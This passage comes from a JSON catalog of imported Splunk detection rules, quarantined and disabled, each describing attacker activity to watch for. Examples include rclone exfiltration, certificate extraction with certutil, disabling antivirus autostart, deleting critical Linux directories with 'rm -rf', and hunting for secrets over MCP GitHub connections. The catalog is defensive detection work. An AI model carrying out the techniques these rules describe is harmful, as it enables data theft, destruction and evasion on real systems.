By monitoring for unusual or unauthorized `rmmod` activity, this analytic helps identify potential tampering with kernel modules, enabling security teams to take proactive measures to protect system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-kernel-module-using-rmmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31810b7a-0abe-42be-a210-0dec8106afee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_kernel_module_using_rmmod_utility.yml" } }, { "id": "splunk-security-content-31a13f43-812e-4752-a6ca-c6c87bf03e83", "type": "detection", "name": "Windows Impair Defenses Disable AV AutoStart via Registry", "description": "The following analytic detects modifications to the registry related to the disabling of autostart functionality for certain antivirus products, such as Kingsoft and Tencent. Malware like ValleyRAT may alter specific registry keys to prevent these security tools from launching automatically at startup, thereby weakening system defenses. By monitoring changes in the registry entries associated with antivirus autostart settings, this detection enables security analysts to identify attempts to disable protective software. 
Detecting these modifications early is critical for maintaining system integrity and preventing further compromise by malicious actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-av-autostart-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31a13f43-812e-4752-a6ca-c6c87bf03e83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_av_autostart_via_registry.yml" } }, { "id": "splunk-security-content-320099b7-7eb1-4153-a2b4-decb53267de2", "type": "detection", "name": "Windows Rundll32 WebDAV Request", "description": "The following analytic identifies the execution of rundll32.exe with command-line arguments loading davclnt.dll and the davsetcookie function to access a remote WebDAV instance. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt to exploit CVE-2023-23397, a known vulnerability. 
If confirmed malicious, this could allow an attacker to execute remote code or exfiltrate data, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-webdav-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "320099b7-7eb1-4153-a2b4-decb53267de2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_webdav_request.yml" } }, { "id": "splunk-security-content-326fdf44-b90c-4d2e-adca-1fd140b10536", "type": "detection", "name": "Windows LOLBAS Executed Outside Expected Path", "description": "The following analytic identifies a LOLBAS process being executed outside of its expected location.\nProcesses being executed outside of expected locations may be an indicator that an adversary is attempting to evade defenses or execute malicious code.\nThe LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lolbas-executed-outside-expected-path.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "326fdf44-b90c-4d2e-adca-1fd140b10536", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lolbas_executed_outside_expected_path.yml" } }, { "id": "splunk-security-content-327fa152-9b56-4e4e-bc0b-2795d4068afa", "type": "detection", "name": "Ollama Abnormal Service Crash Availability Attack", "description": "Detects critical service crashes, fatal errors, and abnormal process terminations in Ollama that may indicate exploitation attempts, resource exhaustion attacks, malicious input triggering unhandled exceptions, or deliberate denial of service attacks designed to disrupt AI model availability and degrade system stability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-abnormal-service-crash-availability-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "327fa152-9b56-4e4e-bc0b-2795d4068afa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_abnormal_service_crash_availability_attack.yml" } }, { "id": "splunk-security-content-32880707-f512-414e-bd7f-204c0c85b758", "type": "detection", "name": "Azure AD Multiple Service Principals Created by User", "description": "The following analytic 
identifies instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD. It detects this activity by monitoring the 'Add service principal' operation and aggregating data in 10-minute intervals. This behavior is significant as it may indicate an adversary rapidly creating multiple service principals to stage an attack or expand their foothold within the network. If confirmed malicious, this activity could allow attackers to establish persistence, escalate privileges, or access sensitive information within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-service-principals-created-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "32880707-f512-414e-bd7f-204c0c85b758", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_service_principals_created_by_user.yml" } }, { "id": "splunk-security-content-32e0baea-b3f1-11eb-a2ce-acde48001122", "type": "detection", "name": "Detect RClone Command-Line Usage", "description": "The following analytic detects the usage of `rclone.exe` with specific command-line arguments indicative of file transfer activities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. 
This activity is significant as `rclone.exe` is often used by adversaries for data exfiltration, especially during ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and potential loss of sensitive information. Immediate isolation of the affected endpoint and further investigation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rclone-command-line-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "32e0baea-b3f1-11eb-a2ce-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rclone_command_line_usage.yml" } }, { "id": "splunk-security-content-3348aefd-9ed8-451f-9993-1e9fa04b5530", "type": "detection", "name": "MCP Github Suspicious Operation", "description": "This detection identifies potentially malicious activity through MCP GitHub server connections, monitoring for secret hunting in code searches, organization and repository reconnaissance, branch protection abuse, CI/CD workflow manipulation, sensitive file access, and vulnerability intelligence gathering. 
These patterns indicate potential supply chain attacks, credential harvesting, or pre-attack reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-github-suspicious-operation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3348aefd-9ed8-451f-9993-1e9fa04b5530", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_github_suspicious_operation.yml" } }, { "id": "splunk-security-content-337a46be-600f-11eb-ae93-0242ac130002", "type": "detection", "name": "Certutil exe certificate extraction", "description": "The following analytic identifies the use of certutil.exe with arguments indicating the manipulation or extraction of certificates.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments.\nThis activity is significant because extracting certificates can allow attackers to sign new authentication tokens, particularly in federated environments like Windows ADFS.\nIf confirmed malicious, this could enable attackers to forge authentication tokens, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": 
false, "path": "detections/splunk-imports/_quarantine/certutil-exe-certificate-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "337a46be-600f-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/certutil_exe_certificate_extraction.yml" } }, { "id": "splunk-security-content-33804986-25dd-43cf-bb6b-dc14956c7cbc", "type": "detection", "name": "Detect Remote Access Software Usage Registry", "description": "The following analytic detects when a known remote access software is added to common persistence locations on a device within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. 
Review the lookup for the entire list and add any others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33804986-25dd-43cf-bb6b-dc14956c7cbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_registry.yml" } }, { "id": "splunk-security-content-339155d6-34cb-4788-9d00-e67f190af93a", "type": "detection", "name": "Windows Change File Association Command To Notepad", "description": "The following analytic detects attempts to change the command value of a file association of an extension to open with Notepad.exe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns and registry modifications.\nThis activity is significant as it can indicate an attempt to manipulate file handling behavior, a technique observed in APT and ransomware attacks like Prestige.\nAfter changing the extension of all encrypted files to a new one, Prestige ransomware modifies the file association for that extension to open with Notepad.exe in order to display a ransom note.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 
"imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-change-file-association-command-to-notepad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "339155d6-34cb-4788-9d00-e67f190af93a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_change_file_association_command_to_notepad.yml" } }, { "id": "splunk-security-content-33ae0931-2a03-456b-b1d7-b016c5557fbd", "type": "detection", "name": "ASL AWS New MFA Method Registered For User", "description": "The following analytic identifies the registration of a new Multi-Factor Authentication (MFA) method for an AWS account, as logged through Amazon Security Lake (ASL). It detects this activity by monitoring the `CreateVirtualMFADevice` API operation within ASL logs. This behavior is significant because adversaries who gain unauthorized access to an AWS account may register a new MFA method to maintain persistence. 
If confirmed malicious, this activity could allow attackers to secure their access, making it harder to detect and remove their presence from the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33ae0931-2a03-456b-b1d7-b016c5557fbd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-33cffee0-41ee-402e-a238-d37825f2d788", "type": "detection", "name": "GitHub Organizations Disable Classic Branch Protection Rule", "description": "The following analytic detects when classic branch protection rules are disabled in GitHub Organizations. The detection monitors GitHub Organizations audit logs for branch protection removal events by tracking actor details, repository information, and associated metadata. For a SOC, identifying disabled branch protection is critical as it could indicate attempts to bypass code review requirements and security controls. Branch protection rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. 
The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-classic-branch-protection-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33cffee0-41ee-402e-a238-d37825f2d788", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_classic_branch_protection_rule.yml" } }, { "id": "splunk-security-content-33f89303-cc6f-49ad-921d-2eaea38a6f7a", "type": "detection", "name": "Linux Deleting Critical Directory Using RM Command", "description": "The following analytic detects the deletion of critical directories on a Linux machine using the `rm` command with argument rf. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions targeting directories like /boot, /var/log, /etc, and /dev. This activity is significant because deleting these directories can severely disrupt system operations and is often associated with destructive campaigns like Industroyer2. 
If confirmed malicious, this action could lead to system instability, data loss, and potential downtime, making it crucial for immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deleting-critical-directory-using-rm-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33f89303-cc6f-49ad-921d-2eaea38a6f7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deleting_critical_directory_using_rm_command.yml" } }, { "id": "splunk-security-content-33fc9f6f-0ce7-4696-924e-a69ec61a3d57", "type": "detection", "name": "Windows PowerShell IIS Components WebGlobalModule Usage", "description": "The following analytic detects the usage of PowerShell Cmdlets - New-WebGlobalModule, Enable-WebGlobalModule, and Set-WebGlobalModule, which are used to create, enable, or modify IIS Modules. This detection leverages PowerShell Script Block Logging, specifically monitoring EventCode 4104 for these cmdlets. This activity is significant as adversaries may use these lesser-known cmdlets to manipulate IIS configurations, similar to AppCmd.exe, potentially bypassing traditional defenses. 
If confirmed malicious, this could allow attackers to persist in the environment, manipulate web server behavior, or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-iis-components-webglobalmodule-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "33fc9f6f-0ce7-4696-924e-a69ec61a3d57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_iis_components_webglobalmodule_usage.yml" } }, { "id": "splunk-security-content-3407b250-345a-4d71-80db-c91e555a3ece", "type": "detection", "name": "Zscaler Adware Activities Threat Blocked", "description": "The following analytic identifies potential adware activity blocked by Zscaler. It leverages web proxy logs to detect blocked actions associated with adware threats. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant as adware can degrade system performance, lead to unwanted advertisements, and potentially expose users to further malicious content. 
If confirmed malicious, it could indicate an attempt to compromise user systems, necessitating further investigation and remediation to prevent potential data breaches or system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-adware-activities-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3407b250-345a-4d71-80db-c91e555a3ece", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_adware_activities_threat_blocked.yml" } }, { "id": "splunk-security-content-3428ac18-a410-4823-816c-ce697d26f7a8", "type": "detection", "name": "Windows Indirect Command Execution Via pcalua", "description": "The following analytic detects programs initiated by pcalua.exe, the Microsoft Windows Program Compatibility Assistant. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process information. While pcalua.exe can start legitimate programs, it is significant because attackers may use it to bypass command line execution protections. 
If confirmed malicious, this activity could allow attackers to execute arbitrary commands, potentially leading to unauthorized actions, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-pcalua.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3428ac18-a410-4823-816c-ce697d26f7a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_pcalua.yml" } }, { "id": "splunk-security-content-34502357-deb1-499a-8261-ffe144abf561", "type": "detection", "name": "Windows Time Based Evasion", "description": "The following analytic detects potentially malicious processes that initiate a ping delay using an invalid IP address.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"ping 0 -n\".\nMalware like NJRAT was observed using this technique to introduce time delays for evasion tactics, such as delaying self-deletion.\nIf confirmed malicious, this activity could indicate an active infection attempting to evade detection, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-time-based-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "34502357-deb1-499a-8261-ffe144abf561", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_time_based_evasion.yml" } }, { "id": "splunk-security-content-3451e58a-9457-4985-a600-b616b0cbfda1", "type": "detection", "name": "O365 Multiple OS Vendors Authenticating From User", "description": "The following analytic identifies when multiple operating systems are used to authenticate to Azure/EntraID/Office 365 by the same user account over a short period of time. This activity could be indicative of attackers enumerating various logon capabilities of Azure/EntraID/Office 365 and attempting to discover weaknesses in the organizational MFA or conditional access configurations. 
Use of tools like \"MFASweep\" will trigger this detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-os-vendors-authenticating-from-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3451e58a-9457-4985-a600-b616b0cbfda1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_os_vendors_authenticating_from_user.yml" } }, { "id": "splunk-security-content-345f7e1d-a3fe-4158-abd8-e630f9878323", "type": "detection", "name": "GCP Authentication Failed During MFA Challenge", "description": "The following analytic detects failed authentication attempts during the Multi-Factor Authentication (MFA) challenge on a Google Cloud Platform (GCP) tenant. It uses Google Workspace login failure events to identify instances where MFA methods were challenged but not successfully completed. This activity is significant as it may indicate an adversary attempting to access an account with compromised credentials despite MFA protection. 
If confirmed malicious, this could lead to unauthorized access attempts, potentially compromising sensitive data and resources within the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "345f7e1d-a3fe-4158-abd8-e630f9878323", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-347e0892-e8f3-4512-afda-dc0e3fa996f3", "type": "detection", "name": "Windows DNS Gather Network Info", "description": "The following analytic detects the use of the dnscmd.exe command to enumerate DNS records. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This activity is significant as it may indicate an adversary gathering network information, a common precursor to more targeted attacks. 
If confirmed malicious, this behavior could enable attackers to map the network, identify critical assets, and plan subsequent actions, potentially leading to data exfiltration or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-gather-network-info.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "347e0892-e8f3-4512-afda-dc0e3fa996f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dns_gather_network_info.yml" } }, { "id": "splunk-security-content-347fd388-da87-11eb-836d-acde48001122", "type": "detection", "name": "Spoolsv Writing a DLL - Sysmon", "description": "The following analytic detects `spoolsv.exe` writing a `.dll` file, which is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527 (PrintNightmare). This detection leverages Sysmon EventID 11 to monitor file creation events in the `\\spool\\drivers\\x64\\` directory. This activity is significant because `spoolsv.exe` typically does not write DLL files, and such behavior could signify an ongoing attack. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-writing-a-dll-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "347fd388-da87-11eb-836d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_writing_a_dll___sysmon.yml" } }, { "id": "splunk-security-content-350837b5-13d3-4c06-b688-db07afbe5050", "type": "detection", "name": "O365 Exfiltration via File Sync Download", "description": "The following analytic detects when an excessive number of files are synced from O365 by the same user over a short period of time. A malicious actor may abuse the user-agent string through GUI or API access to evade triggering the FileDownloaded event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. 
Additional attention should be paid to any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-sync-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "350837b5-13d3-4c06-b688-db07afbe5050", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_sync_download.yml" } }, { "id": "splunk-security-content-35159940-228f-11ec-8a49-acde48001122", "type": "detection", "name": "Vbscript Execution Using Wscript App", "description": "The following analytic detects the execution of VBScript using the wscript.exe application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because the upstream rule treats VBScript run through wscript.exe, rather than the console host cscript.exe, as a deviation from expected usage. Note that wscript.exe is itself a standard Windows Script Host, so this signal is weak on its own and should be tuned against legitimate script usage in the environment; the deviation can indicate an attempt to evade traditional process monitoring and antivirus defenses. 
If confirmed malicious, this technique could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vbscript-execution-using-wscript-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35159940-228f-11ec-8a49-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/vbscript_execution_using_wscript_app.yml" } }, { "id": "splunk-security-content-35307032-a12d-11eb-835f-acde48001122", "type": "detection", "name": "Rundll32 with no Command Line Arguments with Network", "description": "The following analytic detects the execution of rundll32.exe without command line arguments, followed by a network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry and network traffic data. It is significant because rundll32.exe typically requires arguments to function, and its absence is often associated with malicious activity, such as Cobalt Strike. 
